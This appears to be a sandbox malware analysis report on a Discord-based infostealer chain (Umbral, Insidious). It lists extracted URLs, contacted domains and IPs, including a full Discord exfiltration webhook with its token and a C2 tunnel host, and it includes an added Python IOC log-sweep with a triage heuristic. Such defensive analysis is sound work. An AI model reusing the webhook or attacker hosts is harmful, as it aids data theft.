https://docs.google.com/spreadsheets/?usp=installed_webapp | 0% | Avira URL Cloud | safe
http://ipbase.com | 0% | Avira URL Cloud | safe
https://mail.google.com/mail/J | 0% | Avira URL Cloud | safe
https://api.vimeworld.ru/u | 0% | Avira URL Cloud | safe
http://x1.i.lencr.org/0 | 0% | Avira URL Cloud | safe
https://freegeoip.app/xml/8 | 0% | Avira URL Cloud | safe
http://x1.c.lencr.org/0 | 0% | Avira URL Cloud | safe
https://contoso.com/ | 0% | Avira URL Cloud | safe
https://github.com/Blank-c/Umbral-Steal | 0% | Avira URL Cloud | safe
https://drive.google.com/?lfhs=2 | 0% | Avira URL Cloud | safe
https://nuget.org/nuget.exe | 0% | Avira URL Cloud | safe
https://docs.google.com/spreadsheets/: | 0% | Avira URL Cloud | safe
http://ip-api.com | 0% | Avira URL Cloud | safe
https://ipbase.com | 0% | Avira URL Cloud | safe
https://api.vimeworld.ru/user/name/ | 0% | Avira URL Cloud | safe
https://www.youtube.com/s/notifications/manifest/cr_install.html | 0% | Avira URL Cloud | safe
https://api.vimeworld.ru/user/name/5https://freegeoip.app/xml/ | 0% | Avira URL Cloud | safe
https://www.youtube.com/?feature=ytca | 0% | Avira URL Cloud | safe
http://freegeoip.app | 0% | Avira URL Cloud | safe
https://www.youtube.com/J | 0% | Avira URL Cloud | safe
https://freegeoip.app/xml/ | 0% | Avira URL Cloud | safe
https://discord.com/api/v10/users/ | 0% | Avira URL Cloud | safe
http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806- | 0% | Avira URL Cloud | safe
http://nuget.org/NuGet.exe | 0% | Avira URL Cloud | safe
https://discord.com | 0% | Avira URL Cloud | safe
https://drive.google.com/: | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png | 0% | Avira URL Cloud | safe
http://schemas.xmlsoap.org/soap/encoding/ | 0% | Avira URL Cloud | safe
https://steamcommunity.com/profiles/ASOFTWARE | 0% | Avira URL Cloud | safe
https://discord.comyhl8 | 0% | Avira URL Cloud | safe
https://github.com/Blank-c/Umbral-Stealerh | 0% | Avira URL Cloud | safe
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | Avira URL Cloud | safe
https://media.discordapp.net/attachments/1277266726186385433/128176282554= | 0% | Avira URL Cloud | safe
https://contoso.com/Icon | 0% | Avira URL Cloud | safe
http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
https://drive.google.com/J | 0% | Avira URL Cloud | safe
https://www.ecosia.org/newtab/ | 0% | Avira URL Cloud | safe
https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9 | 0% | Avira URL Cloud | safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | Avira URL Cloud | safe
https://media.discordapp.net/attachments/1277266726186385433/128176282554 | 0% | Avira URL Cloud | safe
https://ac.ecosia.org/autocomplete?q= | 0% | Avira URL Cloud | safe
https://github.com/Blank-c/Umbral-Stealer | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://drive.0b | 0% | Avira URL Cloud | safe
https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default | 0% | Avira URL Cloud | safe
https://docs.google.com/presentation/installwebapp?usp=chr | 0% | Avira URL Cloud | safe
http://schemas.xmlsoap.org/wsdl/ | 0% | Avira URL Cloud | safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL | 0% | Avira URL Cloud | safe
http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | Avira URL Cloud | safe
https://ipbase.com/xml/ | 0% | Avira URL Cloud | safe
https://cdn.discordapp.com/attachments/1277266726186385433/1281762825542303845/Umbral-927537.zip?ex= | 0% | Avira URL Cloud | safe
https://docs.google.com/presentation/?usp=installed_webapp | 0% | Avira URL Cloud | safe
https://docs.google.com/presentation/installwebapp?usp=chro0b | 0% | Avira URL Cloud | safe
https://aka.ms/pscore68 | 0% | Avira URL Cloud | safe
https://support.mozilla.org | 0% | Avira URL Cloud | safe
https://docs.google.com/document/?usp=installed_webapp | 0% | Avira URL Cloud | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | Avira URL Cloud | safe
http://ip-api.com/json/?fielH | 0% | Avira URL Cloud | safe
http://ip-api.com/line/?fields=hosting | 0% | Avira URL Cloud | safe
http://ip-api.com/json/?fields=225545 | 0% | Avira URL Cloud | safe
Domains and IPs

Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discord.com | 162.159.135.232 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | true | | unknown
ipbase.com | 104.21.85.189 | true | false | | unknown
freegeoip.app | 188.114.97.3 | true | true | | unknown
stage-von.gl.at.ply.gg | 147.185.221.22 | true | true | | unknown

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
stage-von.gl.at.ply.gg | true | Avira URL Cloud: safe | unknown
https://freegeoip.app/xml/ | false | Avira URL Cloud: safe | unknown
https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9 | true | Avira URL Cloud: safe | unknown
https://ipbase.com/xml/ | false | Avira URL Cloud: safe | unknown
http://ip-api.com/line/?fields=hosting | false | Avira URL Cloud: safe | unknown
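The contacted domains, IPs and URLs above are the network indicators this analysis produced. The Python below is an added example, not part of the Joe Sandbox report, that turns them into a log sweep with a fidelity tier per indicator and a combined verdict. The indicator values are copied from the tables; the tiers, the escalation rule in triage(), the log line formats and the "REDACTED" stand-in for the webhook token are assumptions made for the example.

```python
"""Sweep log lines for the network indicators listed in this report.

Added example; not part of the Joe Sandbox report. The indicator values come
from the report's domain/IP/URL tables; the fidelity tiers and the log formats
are assumptions made for the example.
"""
import re

# (category, fidelity) per indicator. The playit.gg tunnel host and the Discord
# webhook path are specific to this sample; geo-IP services and bare discord.com
# are used by plenty of benign software, so they only count as weak evidence.
IOCS = {
    "stage-von.gl.at.ply.gg": ("c2_tunnel", "high"),
    "147.185.221.22": ("c2_tunnel", "high"),
    "discord.com/api/webhooks/1277266868607909908": ("exfil_webhook", "high"),
    "discord.com": ("exfil_channel", "low"),
    "162.159.135.232": ("exfil_channel", "low"),
    "ip-api.com": ("geoip_lookup", "low"),
    "208.95.112.1": ("geoip_lookup", "low"),
    "freegeoip.app": ("geoip_lookup", "low"),
    "188.114.97.3": ("geoip_lookup", "low"),
    "ipbase.com": ("geoip_lookup", "low"),
    "104.21.85.189": ("geoip_lookup", "low"),
}

# Longest indicator first, so the webhook path wins over bare "discord.com".
# The boundaries stop "208.95.112.1" from matching inside "208.95.112.10" while
# still allowing a leading subdomain label ("api.ip-api.com").
_PATTERNS = [
    (ioc, re.compile(r"(?<![\w-])" + re.escape(ioc) + r"(?![\w-])", re.IGNORECASE))
    for ioc in sorted(IOCS, key=len, reverse=True)
]


def match_line(line):
    """Return (indicator, category, fidelity) for the most specific IOC in a line, else None."""
    for ioc, pattern in _PATTERNS:
        if pattern.search(line):
            category, fidelity = IOCS[ioc]
            return ioc, category, fidelity
    return None


def sweep(lines):
    """Return one hit dict per matching line (1-based line numbers)."""
    hits = []
    for number, line in enumerate(lines, 1):
        matched = match_line(line)
        if matched:
            hits.append({"line": number, "indicator": matched[0], "category": matched[1],
                         "fidelity": matched[2], "text": line.strip()})
    return hits


def triage(hits):
    """Combine hits into a verdict. One high-fidelity hit is enough on its own.
    A geo-IP lookup plus Discord traffic from the same log set mirrors the
    sequence in this report's behavior graph, so that pair is escalated to
    medium (a heuristic chosen for the example, not a rule from the report)."""
    if any(h["fidelity"] == "high" for h in hits):
        return "high"
    categories = {h["category"] for h in hits}
    if "geoip_lookup" in categories and "exfil_channel" in categories:
        return "medium"
    return "low" if hits else "none"


# Constructed sample lines (not from the report): DNS, proxy and flow records
# for two hosts, one of which shows the full sequence seen in the sandbox.
SAMPLE_LOGS = [
    "2024-09-07T10:01:02Z DNS host=WS-017 qname=ip-api.com type=A rcode=NOERROR",
    "2024-09-07T10:01:03Z PROXY host=WS-017 GET http://ip-api.com/line/?fields=hosting status=200",
    "2024-09-07T10:01:05Z DNS host=WS-017 qname=stage-von.gl.at.ply.gg type=A rcode=NOERROR",
    "2024-09-07T10:01:06Z FLOW host=WS-017 dst=147.185.221.22 dport=19496 proto=tcp bytes=4212",
    "2024-09-07T10:01:09Z PROXY host=WS-017 POST https://discord.com/api/webhooks/1277266868607909908/REDACTED status=204",
    "2024-09-07T10:02:00Z DNS host=WS-042 qname=www.example.com type=A rcode=NOERROR",
]

if __name__ == "__main__":
    found = sweep(SAMPLE_LOGS)
    for hit in found:
        print(f"line {hit['line']}: {hit['fidelity']:<4} {hit['category']:<14} {hit['indicator']}")
    print("verdict:", triage(found))
```

Bare hits on ip-api.com, freegeoip.app, ipbase.com or discord.com are weak evidence, since legitimate software talks to all four; the tunnel host stage-von.gl.at.ply.gg, its IP and the webhook path are what identify this sample, and the geo-IP lookup followed by Discord traffic is the order in which the sandboxed stages contacted them, which is why triage() treats that pair as more than the sum of its parts.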
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCIUmbral.exe, 0000003D.00000002.2205074841.00000232B9D71000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe.4.drtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://duckduckgo.com/chrome_newtabInsidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://mail.google.com/mail/?usp=installed_webappUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://duckduckgo.com/ac/?q=Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://mail.google.com/mail/installwebapp?usp=chrome_defaultUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://docs.google.com/presentation/JUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://docs.google.com/document/JUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://drive.google.com/drive/installwebapp?usp=chrome_defaultUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://contoso.com/Licensepowershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://discordapp.com/api/v9/users/Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.youtube.com/:Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://freegeoip.appInsidious.exe, 0000000B.00000002.2166607567.0000024512696000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://discord.comUmbral.exe, 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6749000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://mail.google.com/mail/:Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
URL | Source | Malicious | Antivirus Detection | Reputation
https://media.discordapp.net/attachments/1277266726186385433/1281762825542303845/Umbral-927537.zip?e | Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docs.google.com/document/installwebapp?usp=chrome_default | Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docs.google.com/presentation/: | Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docs.google.com/presentation/installwebapp?usp=chrome_default | Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docs.google.com/document/: | Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docs.google.com/spreadsheets/J | Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/125 | Insidious.exe, 0000000B.00000002.2166607567.0000024512751000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2166607567.00000245126D9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docs.google.com/presentation/installwebapp?usp=chr. | Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://0.0.0.0 | nursultan.bat.4.dr | false | Avira URL Cloud: safe | unknown
https://docs.google.com/spreadsheets/?usp=installed_webapp | Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mail.google.com/mail/J | Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ipbase.com | Insidious.exe, 0000000B.00000002.2166607567.00000245126F6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.vimeworld.ru/u | Insidious.exe, 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://freegeoip.app/xml/8 | Insidious.exe, 00000017.00000002.2134605998.000002ACD01C1000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000026.00000002.2168782168.000001CFADD31000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000038.00000002.2206155033.00000220C94C1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://x1.c.lencr.org/0 | cert9.db.11.dr | false | Avira URL Cloud: safe | unknown
http://x1.i.lencr.org/0 | cert9.db.11.dr | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.dr | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Blank-c/Umbral-Steal | Umbral.exe, 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.2309953331.00000118AA631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docs.google.com/spreadsheets/: | Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.google.com/?lfhs=2 | Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ip-api.com | Umbral.exe, 0000000E.00000002.2590100139.000001DCB66A5000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.vimeworld.ru/user/name/ | Insidious.exe, 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000017.00000002.2134605998.000002ACD01C1000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000026.00000002.2168782168.000001CFADD31000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000038.00000002.2206155033.00000220C94C1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.vimeworld.ru/user/name/5https://freegeoip.app/xml/ | Insidious.exe, 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Insidious.exe.4.dr | false | Avira URL Cloud: safe | unknown
https://www.youtube.com/s/notifications/manifest/cr_install.html | Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Microsoft Edge.exe, 00000003.00000002.3293638320.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2168729014.000001189A5C1000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2166607567.0000024512696000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2240500054.000001AB15891000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ipbase.com | Insidious.exe, 0000000B.00000002.2166607567.00000245126E1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.youtube.com/?feature=ytca | Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://freegeoip.app | Insidious.exe, 0000000B.00000002.2166607567.00000245126BC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806- | Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.dr | false | Avira URL Cloud: safe | unknown
https://www.youtube.com/J | Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.2309953331.00000118AA631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://discord.com | Umbral.exe, 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://discord.com/api/v10/users/ | Umbral.exe.4.dr | false | Avira URL Cloud: safe | unknown
https://drive.google.com/: | Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.dr | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000006.00000002.2168729014.000001189A7E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://steamcommunity.com/profiles/ASOFTWARE | Insidious.exe, 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Insidious.exe.4.dr | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Blank-c/Umbral-Stealerh | Umbral.exe, 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://discord.comyhl8 | Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://media.discordapp.net/attachments/1277266726186385433/128176282554= | Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E3A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.dr | false | URL Reputation: safe | unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0 | cert9.db.11.dr | false | Avira URL Cloud: safe | unknown
http://ocsp.rootca1.amazontrust.com0: | cert9.db.11.dr | false | Avira URL Cloud: safe | unknown
https://drive.google.com/J | Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.dr | false | Avira URL Cloud: safe | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | tmp2887.tmp.tmpdb.11.dr | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.dr | false | Avira URL Cloud: safe | unknown
https://media.discordapp.net/attachments/1277266726186385433/128176282554 | Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Blank-c/Umbral-Stealer | Umbral.exe.4.dr | false | Avira URL Cloud: safe | unknown
https://drive.0b | Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default | Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docs.google.com/presentation/installwebapp?usp=chr | Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
